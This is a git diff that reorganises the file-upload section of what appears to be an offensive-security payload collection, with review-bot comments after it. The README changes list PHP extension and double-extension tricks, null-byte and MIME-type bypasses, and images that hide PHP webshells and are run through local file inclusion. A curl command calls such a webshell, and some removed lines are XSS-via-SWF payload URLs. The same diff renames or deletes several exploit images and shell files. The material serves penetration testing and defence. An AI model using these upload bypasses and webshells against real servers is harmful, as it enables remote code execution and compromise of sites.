Resize/exploit-88.jpg b/Upload insecure files/JPG Resize/exploit-88.jpg deleted file mode 100755 index 0290756..0000000 Binary files a/Upload insecure files/JPG Resize/exploit-88.jpg and /dev/null differ diff --git a/Upload insecure files/JPG Resize/exploit-89.jpg b/Upload insecure files/JPG Resize/exploit-89.jpg deleted file mode 100755 index f7e067b..0000000 Binary files a/Upload insecure files/JPG Resize/exploit-89.jpg and /dev/null differ 
diff --git a/Upload insecure files/JPG Resize/exploit-90.jpg b/Upload insecure files/JPG Resize/exploit-90.jpg deleted file mode 100755 index 1371229..0000000 Binary files a/Upload insecure files/JPG Resize/exploit-90.jpg and /dev/null differ diff --git a/Upload insecure files/JPG Resize/exploit-91.jpg b/Upload insecure files/JPG Resize/exploit-91.jpg deleted file mode 100755 index 9809587..0000000 Binary files a/Upload insecure files/JPG Resize/exploit-91.jpg and /dev/null differ diff --git a/Upload insecure files/JPG Resize/exploit-92.jpg b/Upload insecure files/JPG Resize/exploit-92.jpg deleted file mode 100755 index 5b213e5..0000000 Binary files a/Upload insecure files/JPG Resize/exploit-92.jpg and /dev/null differ diff --git a/Upload insecure files/JPG Resize/exploit-93.jpg b/Upload insecure files/JPG Resize/exploit-93.jpg deleted file mode 100755 index 17746e9..0000000 Binary files a/Upload insecure files/JPG Resize/exploit-93.jpg and /dev/null differ diff --git a/Upload insecure files/JPG Resize/exploit-94.jpg b/Upload insecure files/JPG Resize/exploit-94.jpg deleted file mode 100755 index 22253d7..0000000 Binary files a/Upload insecure files/JPG Resize/exploit-94.jpg and /dev/null differ diff --git a/Upload insecure files/JPG Resize/exploit-95.jpg b/Upload insecure files/JPG Resize/exploit-95.jpg deleted file mode 100755 index 4dbdb4a..0000000 Binary files a/Upload insecure files/JPG Resize/exploit-95.jpg and /dev/null differ diff --git a/Upload insecure files/JPG Resize/exploit-96.jpg b/Upload insecure files/JPG Resize/exploit-96.jpg deleted file mode 100755 index e5d7da5..0000000 Binary files a/Upload insecure files/JPG Resize/exploit-96.jpg and /dev/null differ diff --git a/Upload insecure files/JPG Resize/exploit-97.jpg b/Upload insecure files/JPG Resize/exploit-97.jpg deleted file mode 100755 index bb6b08f..0000000 Binary files a/Upload insecure files/JPG Resize/exploit-97.jpg and /dev/null differ 
diff --git a/Upload insecure files/JPG Resize/exploit-98.jpg b/Upload insecure files/JPG Resize/exploit-98.jpg deleted file mode 100755 index 8a4c53f..0000000 Binary files a/Upload insecure files/JPG Resize/exploit-98.jpg and /dev/null differ diff --git a/Upload insecure files/Metadata GIF/shell_fr.gif b/Upload insecure files/Metadata GIF/shell_fr.gif deleted file mode 100755 index 10ce64b..0000000 Binary files a/Upload insecure files/Metadata GIF/shell_fr.gif and /dev/null differ diff --git a/Upload insecure files/Metadata GIF/shell_problem.gif b/Upload insecure files/Metadata GIF/shell_problem.gif deleted file mode 100755 index 1379a50..0000000 Binary files a/Upload insecure files/Metadata GIF/shell_problem.gif and /dev/null differ diff --git a/Upload insecure files/PHP Extension/shell.shtml b/Upload insecure files/PHP Extension/shell.shtml deleted file mode 100755 index b1abb37..0000000 --- a/Upload insecure files/PHP Extension/shell.shtml +++ /dev/null @@ -1 +0,0 @@ - \ No newline at end of file diff --git a/Upload insecure files/Metadata PNG/Build_image_to_LFI.py b/Upload insecure files/Picture Metadata/Build_image_to_LFI.py similarity index 100% rename from Upload insecure files/Metadata PNG/Build_image_to_LFI.py rename to Upload insecure files/Picture Metadata/Build_image_to_LFI.py diff --git a/Upload insecure files/Metadata PNG/phpinfo-metadata.jpg b/Upload insecure files/Picture Metadata/PHP_exif_phpinfo.jpg similarity index 100% rename from Upload insecure files/Metadata PNG/phpinfo-metadata.jpg rename to Upload insecure files/Picture Metadata/PHP_exif_phpinfo.jpg diff --git a/Upload insecure files/Metadata GIF/shell_cinema.gif b/Upload insecure files/Picture Metadata/PHP_exif_system.gif similarity index 100% rename from Upload insecure files/Metadata GIF/shell_cinema.gif rename to Upload insecure files/Picture Metadata/PHP_exif_system.gif 
diff --git a/Upload insecure files/Picture Metadata/PHP_exif_system.jpg b/Upload insecure files/Picture Metadata/PHP_exif_system.jpg new file mode 100644 index 0000000..385af5a Binary files /dev/null and b/Upload insecure files/Picture Metadata/PHP_exif_system.jpg differ diff --git a/Upload insecure files/Metadata PNG/php_exif_data.png b/Upload insecure files/Picture Metadata/PHP_exif_system.png similarity index 100% rename from Upload insecure files/Metadata PNG/php_exif_data.png rename to Upload insecure files/Picture Metadata/PHP_exif_system.png diff --git a/Upload insecure files/Metadata GIF/phpinfo-metadata.gif b/Upload insecure files/Picture Resize/GIF_exploit.gif similarity index 100% rename from Upload insecure files/Metadata GIF/phpinfo-metadata.gif rename to Upload insecure files/Picture Resize/GIF_exploit.gif diff --git a/Upload insecure files/JPG Resize/exploit-55.jpg b/Upload insecure files/Picture Resize/JPG_exploit-55.jpg similarity index 100% rename from Upload insecure files/JPG Resize/exploit-55.jpg rename to Upload insecure files/Picture Resize/JPG_exploit-55.jpg diff --git a/Upload insecure files/PNG Resize/110x110_resize_bypass_use_LFI.png b/Upload insecure files/Picture Resize/PNG_110x110_resize_bypass_use_LFI.png similarity index 100% rename from Upload insecure files/PNG Resize/110x110_resize_bypass_use_LFI.png rename to Upload insecure files/Picture Resize/PNG_110x110_resize_bypass_use_LFI.png diff --git a/Upload insecure files/PNG Resize/32x32_resize_bypass_use_LFI.png b/Upload insecure files/Picture Resize/PNG_32x32_resize_bypass_use_LFI.png similarity index 100% rename from Upload insecure files/PNG Resize/32x32_resize_bypass_use_LFI.png rename to Upload insecure files/Picture Resize/PNG_32x32_resize_bypass_use_LFI.png 
diff --git a/Upload insecure files/JPG Resize/README.txt b/Upload insecure files/Picture Resize/README.txt similarity index 100% rename from Upload insecure files/JPG Resize/README.txt rename to Upload insecure files/Picture Resize/README.txt diff --git a/Upload insecure files/JPG Resize/bulletjpg.py b/Upload insecure files/Picture Resize/exploit_JPG.py similarity index 100% rename from Upload insecure files/JPG Resize/bulletjpg.py rename to Upload insecure files/Picture Resize/exploit_JPG.py diff --git a/Upload insecure files/Picture Resize/exploit_PNG_110x110.php b/Upload insecure files/Picture Resize/exploit_PNG_110x110.php new file mode 100644 index 0000000..95c4180 --- /dev/null +++ b/Upload insecure files/Picture Resize/exploit_PNG_110x110.php @@ -0,0 +1,22 @@ + \ No newline at end of file diff --git a/Upload insecure files/README.md b/Upload insecure files/README.md index 207c280..35d7fb5 100644 --- a/Upload insecure files/README.md +++ b/Upload insecure files/README.md 
@@ -4,7 +4,49 @@ Uploaded files may pose a significant risk if not handled correctly. A remote at ## Exploits -### Image Tragik +### PHP Extension + +```powershell +.php +.php3 +.php4 +.php5 +.php7 + +Less known extensions +.pht +.phar +.phpt +.pgif +.phtml + +Double extensions +.jpeg.php +.jpg.php +.png.php +``` + +### Upload tricks + +- Null byte (eg: shell.php%00.gif, shell.php%00.png) +- Mime type, change `Content-Type : application/x-php` or `Content-Type : application/octet-stream` to `Content-Type : image/gif` + +### Picture upload with LFI + +Valid pictures hosting PHP code. Upload the picture and use a local file inclusion to execute the code. The shell can be called with the following command : `curl 'http://localhost/test.php?0=system' --data "1='ls'"`. + +- Picture Metadata, hide the payload inside a comment tag in the metadata. +- Picture Resize, hide the payload within the compression algorithm in order to bypass a resize. Also defeating `getimagesize()` and `imagecreatefromgif()`. + +### Configuration Files + +- .htaccess +- web.config +- httpd.conf +- \_\_init\_\_.py + + +### CVE - Image Tragik ```powershell HTTP Request 
@@ -12,57 +54,9 @@ Reverse Shell Touch command ``` -### PHP Extension - -```powershell -.php - -Less known extension -.pht -.pgif -.phtml -.shtml - -Double extension -.jpeg.php -.png.php -``` - -### PNG Bypass a resize - -Upload the picture and use a local file inclusion - -```powershell -You can use it by specifying $_GET[0] as shell_exec and passing a $_POST[1] parameter with the shell command to execute. -curl 'http://localhost/b.php?0=shell_exec' --data "1='ls'" -curl 'http://localhost/test.php?0=system' --data "1='ls'" -``` - -### JPG Bypass a resize - -Upload the picture and use a local file inclusion - -```powershell -http://localhost/test.php?c=ls -``` - -### XSS via SWF - -As you may already know, it is possible to make a website vulnerable to XSS if you can upload/include a SWF file into that website. I am going to represent this SWF file that you can use in your PoCs. -This method is based on [1] and [2], and it has been tested in Google Chrome, Mozilla Firefox, IE9/8; there should not be any problem with other browsers either. - -```powershell -Browsers other than IE: http://0me.me/demo/xss/xssproject.swf?js=alert(document.domain); - -IE8: http://0me.me/demo/xss/xssproject.swf?js=try{alert(document.domain)}catch(e){ window.open(‘?js=history.go(-1)’,’_self’);} - -IE9: http://0me.me/demo/xss/xssproject.swf?js=w=window.open(‘invalidfileinvalidfileinvalidfile’,’target’);setTimeout(‘alert(w.document.location);w.close();’,1); -``` - -### .htaccess - -An .htaccess file is a way to configure the details of your website without needed to alter the server config files. 
- ## References * Bulletproof Jpegs Generator - Damien "virtualabs" Cauquil +* [BookFresh Tricky File Upload Bypass to RCE, NOV 29, 2014 - AHMED ABOUL-ELA](https://secgeek.net/bookfresh-vulnerability/) +* [Encoding Web Shells in PNG IDAT chunks, 04-06-2012, phil](https://www.idontplaydarts.com/2012/06/encoding-web-shells-in-png-idat-chunks/) +* [La PNG qui se prenait pour du PHP, 23 février 2014](https://phil242.wordpress.com/2014/02/23/la-png-qui-se-prenait-pour-du-php/) \ No newline at end of file diff --git a/Upload insecure files/IIS/index.stm b/Upload insecure files/Server Side Include/index.stm similarity index 100% rename from Upload insecure files/IIS/index.stm rename to Upload insecure files/Server Side Include/index.stm
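Review bot: `JPG Resize/exploit-74.jpg` through `exploit-98.jpg` are deleted while `exploit-55.jpg` alone survives as `Picture Resize/JPG_exploit-55.jpg`, yet `JPG Resize/README.txt` and `bulletjpg.py` move into `Picture Resize/` at 100% similarity (the script as `exploit_JPG.py`); check that the unchanged README.txt does not still list the removed samples or call the script `bulletjpg.py`, and update it in this change if it does.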
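Review bot: the new `Picture Resize/exploit_PNG_110x110.php` (hunk `@@ -0,0 +1,22 @@`) lands without a newline at end of file; add one. Its 22 added lines do not render in this diff, so the body could not be reviewed here, and nothing in the README hunk says how the script relates to `PNG_110x110_resize_bypass_use_LFI.png` that sits beside it; a comment line at the top of the script, or a mention under `### Picture upload with LFI`, would tie the two together.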
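Review bot: in the README hunk `@@ -4,7 +4,49 @@`, the command `curl 'http://localhost/test.php?0=system' --data "1='ls'"` is given with no explanation of what `0` and `1` are, while the sentence that did explain it ("You can use it by specifying $_GET[0] as shell_exec and passing a $_POST[1] parameter with the shell command to execute") is deleted in the next hunk; carry that sentence over so the parameter convention stays documented. Two smaller points: the extension list under `### PHP Extension` is fenced as `powershell` but is plain text (the `HTTP Request` block under `### CVE - Image Tragik` has the same mislabel), so tag both as text; and `### Configuration Files` is now a bare list of four filenames, whereas the removed `### .htaccess` section at least said what the file is for, so keep one line per entry explaining why it matters to upload handling. Header names in the `Upload tricks` bullet should also be written `Content-Type:` without the space before the colon.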
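Review bot: hunk `@@ -12,57 +54,9 @@` drops `### XSS via SWF` entirely, while every other removed section reappears under a new heading (`PHP Extension`, `Picture Resize`, `Configuration Files`) or a new directory (`shell.shtml` and `index.stm` into `Server Side Include`); if the removal is intentional, state it in the commit message, otherwise give the SWF material its own directory like the others. In the `## References` block, the surviving entry `Bulletproof Jpegs Generator - Damien "virtualabs" Cauquil` is the only one without a link, the three added entries use three different date formats (`NOV 29, 2014`, `04-06-2012`, `23 février 2014`), and the file now ends without a trailing newline; normalise the dates, add the missing link if one exists, and end the file with a newline.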